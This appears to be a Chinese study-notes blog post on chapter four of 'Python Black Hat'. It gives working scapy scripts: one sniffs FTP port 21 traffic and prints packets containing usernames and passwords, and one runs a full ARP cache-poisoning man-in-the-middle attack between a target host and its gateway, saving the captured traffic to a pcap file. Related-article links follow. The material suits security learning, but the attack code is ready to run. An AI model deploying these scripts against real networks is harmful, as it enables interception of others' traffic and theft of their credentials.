Scapy窃取ftp登录账号密码

sniff函数的参数

filter 过滤规则,默认是嗅探所有数据包,具体过滤规则与wireshark相同。
iface 参数设置嗅探器索要嗅探的网卡,默认对所有的网卡进行嗅探。
prn 参数指定嗅探到符合过滤器条件的数据包时所调用的回调函数,这个回调函数以接受到的数据包对象作为唯一参数。
count 你需要嗅探的数据包的个数,默认无限个。
store 值为0 表示不再内存中保存原始包

建议在linux下使用scapy模块,运行时需要root权限

from scapy.all import *

# 数据包回调函数

def packet_callback(packet):

    print(packet.show())

# 开启嗅探器

sniff(prn=packet_callback, count=1)


from scapy.all import *

from scapy.layers.inet import TCP, IP

def packet_callback(packet):

    # 判断数据包在TCP层是否有负载(数据)下图中的load

    if packet[TCP].payload:

        ftp_pack = str(packet[TCP].payload)

        # 检查数据中是否含有user,pass字符串

        if "user" in ftp_pack.lower() or "pass" in ftp_pack.lower():

            print("[*] Server: %s" % packet[IP].dst)

            print("[*] %s" % packet[TCP].payload)

sniff(filter="tcp port 21", prn=packet_callback, store=0)

利用Scapy进行缓存投毒

import os

import sys

import signal

import threading

from scapy.all import *

from scapy.layers.l2 import ARP, Ether

interface = "ens33"  # 网卡

target_ip = "192.168.1.100"  # 被欺骗主机的IP

gateway_ip = "192.168.1.1"  # 网关

packet_count = 1000  # 发送数据包次数

poisoning = True  # 是否进行投毒

# 定义重置网络函数,当ARP投毒结束后,还原网络状态

def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):

    # 以下代码中调用send函数的方式稍有不同

    print("[*] Restoring target...")

    # 首先使用ARP()构造arp数据包,op=2 表示这是ARP应答包,psrc,pdst表源IP与目的IP,hwdst,hwsrc表源目mac,最后使用send方法发送构造好的ARP应答包count=5表发送5次

    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)

    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)

    # 发送退出信号到主进程

    os.kill(os.getpid(), signal.SIGINT)

# 定义获取MAC函数,用于获取被欺骗主机与网关的MAC地址

def get_mac(ip_address):

    response, unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address), timeout=2, retry=10)

    # 返回从响应数据中获取的MAC地址

    for s, r in response:

        return r[Ether].src

    return None

# 定义投毒函数,对网关与主机进行欺骗

def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):

    global poisoning

    poison_target = ARP()

    poison_target.op = 2

    poison_target.psrc = gateway_ip

    poison_target.pdst = target_ip

    poison_target.hwdst = target_mac

    poison_gateway = ARP()

    poison_gateway.op = 2

    poison_gateway.psrc = target_ip

    poison_gateway.pdst = gateway_ip

    poison_gateway.hwdst = gateway_mac

    print("[*] Beginning the ARP poison. [CTRL-C to stop]")

    while poisoning:

        send(poison_target)

        send(poison_gateway)

        time.sleep(2)

    print("[*] ARP poison attack finished.")

    return

# 设置嗅探的网卡

# conf是在scapy库中声明的一个Conf类,在config.py中

conf.iface = interface

# verb:详细级别,从0到3,越高越详细

# 关闭输出

conf.verb = 0

print("[*] Setting up %s" % interface)

gateway_mac = get_mac(gateway_ip)

# 判断是否获得网关MAC

if gateway_mac is None:

    print("[!!!] Failed to get gateway MAC. Exiting.")

    sys.exit(0)

else:

    print("[*] Gateway %s is at %s" % (gateway_ip, gateway_mac))

target_mac = get_mac(target_ip)

# 判断是否获得被欺骗主机MAC

if target_mac is None:

    print("[!!!] Failed to get target MAC. Exiting.")

    sys.exit(0)

else:

    print("[*] Target %s is at %s" % (target_ip, target_mac))

# 启动ARP投毒线程

poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac, target_ip, target_mac))

poison_thread.start()

# 开启嗅探器,捕捉相关数据包

try:

    print("[*] Starting sniffer for %d packets" % packet_count)

    bpf_filter = "ip host %s" % target_ip  # BPF过滤规则

    packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)

except KeyboardInterrupt:

    pass

finally:

    # 将捕获的数据包保存到arper.pcap方便wireshark查看

    print("[*] Writing packets to arper.pcap")

    wrpcap("arper.pcap", packets)

    # 停止投毒 因为线程共享变量

    poisoning = False

    # 阻塞等待正在投毒的线程退出

    poison_thread.join()

    # 恢复网络

    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

    sys.exit(0)

python黑帽子(第四章)的更多相关文章

  1. python黑帽子(第五章)

    对开源CMS进行扫描 import os import queue import requests # 原书编写时间过于久远 现在有requests库对已经对原来的库进行封装 更容易调用 import ...

  2. python黑帽子(第三章)

    Windows/Linux下包的嗅探 根据os.name判断操作系统 下面是os的源码 posix是Linux nt是Windows 在windows中需要管理员权限.linux中需要root权限 因 ...

  3. 读书笔记 ~ Python黑帽子 黑客与渗透测试编程之道

    Python黑帽子  黑客与渗透测试编程之道   <<< 持续更新中>>> 第一章: 设置python 环境 1.python软件包管理工具安装 root@star ...

  4. 2017-2018-2 20179204 PYTHON黑帽子 黑客与渗透测试编程之道

    python代码见码云:20179204_gege 参考博客Python黑帽子--黑客与渗透测试编程之道.关于<Python黑帽子:黑客与渗透测试编程之道>的学习笔记 第2章 网络基础 t ...

  5. python学习心得第四章

     python 学习心得第四章 1.lambda表达式 1:什么是lambda表达式 为了简化简单函数的代码,选择使用lambda表达式 上面两个函数的表达式虽然不一样,但是本质是一样的,并且lamb ...

  6. 进击的Python【第十四章】:Web前端基础之Javascript

    进击的Python[第十四章]:Web前端基础之Javascript 一.javascript是什么 JavaScript 是一种轻量级的编程语言. JavaScript 是可插入 HTML 页面的编 ...

  7. 《Python CookBook2》 第四章 Python技巧 对象拷贝 && 通过列表推导构建列表

    (先学第四章) 对象拷贝 任务: Python通常只是使用指向原对象的引用,并不是真正的拷贝. 解决方案: >>> a = [1,2,3] >>> import c ...

  8. [Python学习笔记][第四章Python字符串]

    2016/1/28学习内容 第四章 Python字符串与正则表达式之字符串 编码规则 UTF-8 以1个字节表示英语字符(兼容ASCII),以3个字节表示中文及其他语言,UTF-8对全世界所有国家需要 ...

  9. 《零压力学Python》 之 第四章知识点归纳

    第四章(决策和循环)知识点归纳 if condition: indented_statements [ elif condition: Indented_statements] [else: Inde ...

随机推荐

  1. 6月11日 python复习 mysql

    01. 列举常见的关系型数据库和非关系型都有那些? 1.关系型数据库通过外键关联来建立表与表之间的关系,---------常见的有:SQLite.Oracle.mysql 2.非关系型数据库通常指数据 ...

  2. 《前端运维》二、Nginx--3静态资源服务、跨域与其他

    一.静态资源服务 首先,静态资源一般是指客户端发送请求到Web服务器,web服务器从内存中取得相应的文件,返回给客户端,客户端解析并渲染出来.动态资源呢,则是由客户端发起请求,先交由web容器,web ...

  3. Ubuntu一键安装LAMP,LNMP

    参考: https://blog.csdn.net/xueyingqi/article/details/50674078 https://www.cnblogs.com/pengzheng/p/363 ...

  4. CF1500D Tiles for Bathroom (递推+大讨论)

    题目大意:给你一个n*n的矩阵,现在问对于每个k\le n,求出所有k*k的子矩阵中,元素种类数不超过q的矩阵个数,n\le 1500, q\le 10 先考虑最暴力的做法: 对于每个格子,求出以它为 ...

  5. HMS Core 机器学习服务6.4.0版本更新啦,文本翻译功能增加10种小语种语言类型!

    近日,HMS Core机器学习服务(ML Kit)文本翻译功能在6.4.0版本更新中增加了10种小语种语言类型,分别是马其他语.马其顿.冰岛.乌尔都语.波斯尼亚语.乌克兰语.加泰罗尼亚语.斯洛文尼亚语 ...

  6. Vue实例(1)

    vue入门示例(一) herokang 2019-08-21 15:33:58  12696  收藏 44 分类专栏: 前端 文章标签: vue入门 版权 为了让广大后端人员更快的理解上手vue,我们 ...

  7. kafka 保证消息被消费和消息只消费一次

    1. 保证消息被消费 即使消息发送到了消息队列,消息也不会万无一失,还是会面临丢失的风险. 我们以 Kafka 为例,消息在Kafka 中是存储在本地磁盘上的, 为了减少消息存储对磁盘的随机 I/O, ...

  8. tomcat 部署war,umask上传文件后无法通过nginx反向代理访问上传后的文件

    Catalina.sh文件,把umask修改为 0022 即可. 引用:https://tomcat.apache.org/tomcat-8.5-doc/security-howto.html

  9. @Required 注解?

    这个注解表明bean的属性必须在配置的时候设置,通过一个bean定义的显式的属性值或通过自动装配,若@Required注解的bean属性未被设置,容器将抛出BeanInitializationExce ...

  10. 深入理解Java虚拟机-JVM运行时数据区域

    一.运行时数据区域 1.程序计数器 程序计数器( Program Counter Register) 是一块较小的内存空间, 它可以看作是当前线程所执行的字节码的行号指示器. Java虚拟机的多线程是 ...